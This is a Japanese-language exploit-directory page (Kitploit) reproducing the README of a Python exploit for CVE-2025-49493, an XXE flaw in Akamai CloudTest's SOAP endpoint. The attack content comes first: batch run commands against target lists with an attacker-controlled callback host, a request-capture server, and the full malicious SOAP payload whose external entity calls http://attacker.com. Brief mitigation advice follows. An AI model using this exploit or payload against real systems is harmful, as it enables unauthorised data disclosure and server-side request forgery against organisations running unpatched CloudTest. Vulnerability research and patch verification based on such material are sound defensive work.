Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-49493 — これはCVE-2025-49493用のPythonベースのエクスプロイトであり、Akamai CloudTestのバージョン60 2025.06.02 (12988)より前のバージョンに影響します。この脆弱性は、SOAPサービスエンドポイントを介したXML External Entity (XXE)インジェクションを可能にします。 | Kitploit
ツール/GitHubGitHub/sh4den/cve-2025-49493
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubsh4den/cve-2025-49493

CVE-2025-49493

これはCVE-2025-49493用のPythonベースのエクスプロイトであり、Akamai CloudTestのバージョン60 2025.06.02 (12988)より前のバージョンに影響します。この脆弱性は、SOAPサービスエンドポイントを介したXML External Entity (XXE)インジェクションを可能にします。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Akamai CloudTest XXEエクスプロイト (CVE-2025-49493)

概要

これはCVE-2025-49493用のPythonベースのエクスプロイトで、Akamai CloudTestのバージョン60 2025.06.02 (12988) より前のバージョンに影響します。この脆弱性により、SOAPサービスエンドポイントを介したXML外部実体(XXE)インジェクションが可能になります。

脆弱性の詳細

  • CVE ID: CVE-2025-49493
  • 脆弱性タイプ: XML外部実体(XXE)インジェクション
  • 深刻度: 緊急 (CVSS 9.1)
  • 影響を受けるソフトウェア: Akamai CloudTest
  • 影響を受けるバージョン: 60 2025.06.02 (12988) より前
  • 攻撃ベクトル: ネットワーク
  • 必要な認証: 不要

技術詳細

この脆弱性は、/concerto/services/RepositoryService SOAPエンドポイントに存在し、XML入力が外部実体の適切なサニタイズなしに処理されます。攻撃者は悪意のあるXMLペイロードを作成してXXE攻撃を誘発し、以下につながる可能性があります:

  • 情報漏えい
  • SSRF(サーバーサイドリクエストフォージェリ)
  • サービス拒否
  • 特定の構成においてリモートコード実行(RCE)の可能性

特徴

  • ターゲット発見: Akamai CloudTestインスタンスを自動的に識別します
  • 脆弱性検出: 脆弱なエンドポイントと指標を確認します
  • XXEエクスプロイト: XXEペイロードを含む細工されたSOAPリクエストを送信します
  • 複数ターゲット: ターゲットファイルからのバッチ処理をサポートします
  • 詳細なログ: タイムスタンプ付きの包括的なカラーログ
  • エラーハンドリング: ネットワーク問題に対する堅牢なエラーハンドリング

インストール

前提条件

  • Python 3.6 以上
  • pipパッケージマネージャー

依存関係

必要なパッケージをインストールします:

root@kitploit:~
pip install -r requirements.txt

または手動でインストール:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

使用方法

基本的な使い方

root@kitploit:~
python main.py targets.txt xxe.attacker.com

高度な使い方

root@kitploit:~
# カスタムタイムアウト
python main.py targets.txt collaborator.burp.com --timeout 20

# OOB検出にinteractshを使用
python main.py targets.txt attacker.interactsh.com

コマンドラインオプション

root@kitploit:~
positional arguments:
  targets              ターゲットファイル(Akamai CloudTestホストのリスト)
  xxe_server          リクエストをキャプチャするXXEサーバー(例:attacker.com または IP)

optional arguments:
  -h, --help          このヘルプメッセージを表示して終了
  --timeout TIMEOUT   リクエストタイムアウト(秒)(デフォルト:10)

ターゲットファイルの形式

各行に1つのターゲットを記述したtargets.txtファイルを作成します:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

XXEサーバーの設定

オプション1: Burp Collaboratorの使用

  1. Burp Suite Professionalを開く
  2. Burp > Burp Collaborator client に移動
  3. 「Copy to clipboard」をクリックしてコラボレーターURLを取得
  4. このURLをxxe_serverパラメータとして使用

オプション2: Interactshの使用

  1. interactshをインストール:go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. 実行:interactsh-client
  3. 提供されたURLをxxe_serverパラメータとして使用

オプション3: カスタムHTTPサーバー

リクエストをキャプチャする簡単なHTTPサーバーをセットアップする:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

エクスプロイトの流れ

  1. ターゲット検証: URL形式とアクセス可能性を検証
  2. 脆弱性検出:
    • 応答内のCloudTest指標を確認
    • SOAPサービスエンドポイントの存在を確認
  3. XXEペイロード生成: XXEを含む悪意のあるSOAPエンベロープを作成
  4. エクスプロイト: 細工されたリクエストを脆弱なエンドポイントに送信
  5. 結果分析: 成功指標の応答を分析

XXEペイロード構造

エクスプロイトは次のXXEペイロード構造を使用します:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

緩和策

管理者向け

  1. 即時対応:

    • Akamai CloudTestをバージョン60 2025.06.02以降に更新
    • 不審なXML処理アクティビティのログを監視
    • ネットワークセグメンテーションを実装して露出を制限
  2. 長期的な解決策:

    • XMLパーサーでXML外部実体処理を無効化
    • 入力検証とサニタイズを実装
    • XML処理に許可リストを使用
    • 定期的なセキュリティ評価

開発者向け

  1. 安全なXML処理:

    root@kitploit:~
    # XMLパーサーで外部実体を無効化
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. 入力検証:

    • すべてのXML入力を厳格なスキーマに対して検証
    • XML処理の前にユーザー制御データをサニタイズ
    • 適切なエラーハンドリングを実装

参考文献

  • xbowによるオリジナル研究
  • Akamai CloudTest チェンジログ
  • CVE-2025-49493 詳細
  • OWASP XXE 防止

法的免責事項

このツールは教育および許可されたテスト目的でのみ提供されます。ユーザーはシステムをテストする前に適切な許可を得る責任があります。著者は、このツールの誤用またはそれによって引き起こされた損害について一切責任を負いません。

コントリビューション

  1. リポジトリをフォーク
  2. 機能ブランチを作成
  3. 変更を加える
  4. 該当する場合はテストを追加
  5. プルリクエストを送信

ライセンス

このプロジェクトはMITライセンスの下でライセンスされています - 詳細はLICENSEファイルを参照してください。

著者

  • オリジナル研究: xbow, 3th1c_yuk1
  • エクスプロイト開発: セキュリティ研究チーム
  • CVE割り当て: CVE-2025-49493

変更履歴

v1.0.0

  • 初回リリース
  • 基本的なXXEエクスプロイト機能
  • ターゲットファイルサポート
  • 包括的なログ記録
  • エラーハンドリングの改善
ツールをダウンロード